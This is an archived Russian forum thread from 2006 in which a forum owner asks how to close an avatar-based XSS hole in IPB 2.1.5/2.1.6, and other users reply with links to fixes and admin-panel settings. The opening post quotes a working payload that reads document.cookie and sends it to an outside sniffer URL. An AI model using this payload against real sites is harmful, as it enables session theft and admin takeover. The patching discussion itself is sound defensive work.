PDA

Просмотр полной версии : Как пофиксить баг в форумах IPB 2.1.5 и 2.1.6?

Dimazzz
30.06.2006, 13:10
Как всем известно в форуме IPB 2.1.5 и 2.1.6 есть такая бага, которая позволяет получить ХЕШ через аватар, по средством:

javascript:x=document.cookie%3Bimg=new%20Image()%3 Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif

для версии 2.1.6 нужно просто убрать теги [img]

у мня просьба : Подскажите как профиксить эту багу? в каком модуме ошибка и как ее исправить?
Если можно ответ скинуть в личку.

Заранее благодарен.
Ch3ck
30.06.2006, 13:14
В основном всё на сайт по безопасности расписано, где, чего, в каком модуле...поищи
DimaHbl4
30.06.2006, 14:27
Тебе вот СЮДА (http://ibresource.ru/)

На даном форуме дыры находят,а не заделывают...
limpompo
30.06.2006, 14:37
http://www.ibresource.ru/forums/index.php?s=&showtopic=31531&view=findpost&p=187743
Dimazzz
30.06.2006, 15:19
спс ;) я нашол там одну темку , но чет не помогает:(, может эта бага еще осталась из версии 2.0.*
DimaHbl4
30.06.2006, 15:32
Вот последняя известная бага, как пофиксить здесь.
http://www.ibresource.ru/forums/index.php?showtopic=31531&pid=187743&st=0%EF%BF%BDentry18774
Dimazzz
30.06.2006, 15:35
Да эти я заделал :) , я никак немогу разобраться с той что через аватар :(
DimaHbl4
30.06.2006, 16:01
Если ты хочешь запретить [img] теги, ну то есть использование в них изображений. В которых можно поместить сниффер.

1.Заходишь в админу
2.Идешь в Настройки(В меню выбора сферху)
3.В "системных настройках" выбираещь "все основные настройки"
4.Переходишь в Темы, Сообщения и Опросы
5.В "Создание сообщения" находишь "Разрешенные к публикации в сообщениях расширения файлов изображений" и просто удаляешь все разрешения которые там стоят.
bl4ck-cat
30.06.2006, 17:39
хм... а разве хэш воруется не солёный? тоесть от него же толку нету это просто активная хсс.... только кукизы тырить...
DimaHbl4
30.06.2006, 18:11
bl4ck-cat
С этим кукисом можно только под Админом зайти. Ну а топикстартер не хочет этого, т.к. злоумышленик может по форуму как админ лазить, все редактировать и т.д.
Dimazzz
04.07.2006, 12:18
Если ты хочешь запретить [img] теги, ну то есть использование в них изображений. В которых можно поместить сниффер.

1.Заходишь в админу
2.Идешь в Настройки(В меню выбора сферху)
3.В "системных настройках" выбираещь "все основные настройки"
4.Переходишь в Темы, Сообщения и Опросы
5.В "Создание сообщения" находишь "Разрешенные к публикации в сообщениях расширения файлов изображений" и просто удаляешь все разрешения которые там стоят.


меня интересует версия 2.1.6 как извесно туда код вставляется без тегов [img]
Dimazzz
04.07.2006, 12:20
кто нить знает как это долб**** дырку закрыть?